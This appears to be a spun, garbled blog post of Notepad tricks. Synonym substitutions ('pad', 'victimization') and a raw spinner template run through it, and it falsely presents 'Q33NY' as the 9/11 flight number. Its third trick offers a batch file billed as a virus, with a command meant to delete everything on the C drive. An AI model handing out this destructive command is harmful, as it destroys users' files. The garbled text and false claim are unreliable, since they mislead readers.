Translate

Monday, 18 November 2013
0 comments

notepad tricks just for fun


notepad tricks

1. World Trade Center Attack Trick

The flight range of the plane that had hit World Trade Center on  (9/11) was Q33NY. currently we have a tendency to decision this trick or a coincidence or one thing else however no matter it's you may be definately surprised by the this trick.

    1. Open pad and kind “Q33N” (without quotes) in capital letters.

    2. Increase the font size to seventy two.

    3. amendment the Font to Wingdings.

    World Trade Center pad Trick

2. Matrix result Trick

matrix result trick

In this trick i'll show you to create a batch enter pad which is able to act as matrix result that you simply may need seen in movies.Matrix result is largely range flashes in inexperienced color.

    1. Open Noteapad and replica below code into it.

    @echo off

    color 02

    :start

    echo indiscriminately indiscriminately indiscriminately indiscriminately indiscriminately

    goto start

    2. currently save this file as Matrix.bat (name is something however .bat is must)

    3. Open your saved file and you may have matrix result on your screen.

    Matrix result victimization pad

    Advance Matrix result

3. making Virus That Format C Drive

In this trick we are going to be making virus in pad victimization batch file programming. This virus is basically straightforward to make nevertheless terribly dangerous. gap this file we have a tendency to delete or format C drive of your pc.

    1. Open pad and replica below code into it.

    @Echo off

    Del C:\ *.* |y

    2. Then Save this file as virus.bat

    3. Now, running this file format C Drive.

    Learn to create Dangerous Virus In Minute

4. creating Personal Diary victimization pad

notepad tricks

Here you may learn to use pad as Digital diary or a log book to stay record of your daily work rather than victimization pen and paper.

    1. Open pad and kind .LOG (in capital Letters and press enter

    2. Save the program with any name and shut it.

    3. Open the file once more. currently you'll be able to see current date and time, this may happen when you open pad

 create Personal Diary victimization pad

5. recreation Keyboard light-emitting diode

keyboard recreation light-emitting diode

In this half i'll show you {to create|to form|to create} fascinating file victimization pad which is able to make keyboard light-emitting diode to bounce. primarily we are going to be making a visible basic script.

    1. Open pad and replica below codes into it.

    Set wshShell =wscript.CreateObject("WScript.Shell")

    do

    wscript.sleep 100

    wshshell.sendkeys ""

    wshshell.sendkeys ""

    wshshell.sendkeys ""

    loop

    2. Then save this file as dance.vbs (name is something however .vbs is must)

    3. Open your save file and see your keyboard light-emitting diode blinking like dance hall lights.

    Keyboard recreation light-emitting diode lightweight Trick

World trade center attack trick on notepad



            As some of you might be knowing that the flight number of the plane that had hit World Trade Center on that dreadful day (9/11) was Q33NY. Now call this trick a coincidence or anything else but whatever it is, it does startle us. you will be definately amazed by the this trick.

  • First open Notepad.
  • Type “Q33N” (without quotes) in capital letters.
  • Increase the font size to 72.
  • Change the Font to Wingdings.
- See more at: http://www.coolhackingtrick.com/2011/12/world-trade-center-attack-trick-on.html#sthash.ksRd1dWC.dpuf
 
Toggle Footer
Top